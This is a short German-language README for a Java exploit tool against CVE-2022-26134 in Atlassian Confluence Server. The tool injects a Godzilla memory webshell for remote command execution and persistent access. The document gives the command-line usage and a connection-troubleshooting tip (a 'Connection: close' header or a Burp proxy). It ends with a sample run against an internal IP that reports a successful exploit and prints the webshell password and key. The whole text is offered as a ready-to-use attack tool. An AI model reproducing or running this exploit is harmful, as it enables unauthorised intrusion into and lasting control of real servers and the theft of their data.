
Java-basierter Exploit für CVE-2022-26134, der eine Godzilla-Webshell in Atlassian Confluence-Server injiziert und so die Ausführung von Befehlen aus der Ferne sowie persistenten Speicher-Shell-Zugriff ermöglicht.
java -jar CVE-2022-26134.jar Godzilla-Passwort Godzilla-Schlüssel
Beispiel
java -jar CVE-2022-26134.jar pass key
Wenn das Memory-Shell erfolgreich injiziert wurde, Godzilla jedoch keine Verbindung herstellen kann, fügen Sie bitte den folgenden Header zur Anfrage hinzu oder konfigurieren Sie einen Burp-Proxy für Godzilla:
Connection: close

C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] URL: http://10.10.10.10:8090/
[*] Sende Payload
[*] Exploit erfolgreich
[*] Godzilla-Webshell-Passwort: pass
[*] Godzilla-Webshell-Schlüssel: key
C:\CVE_2022_26134_jar>
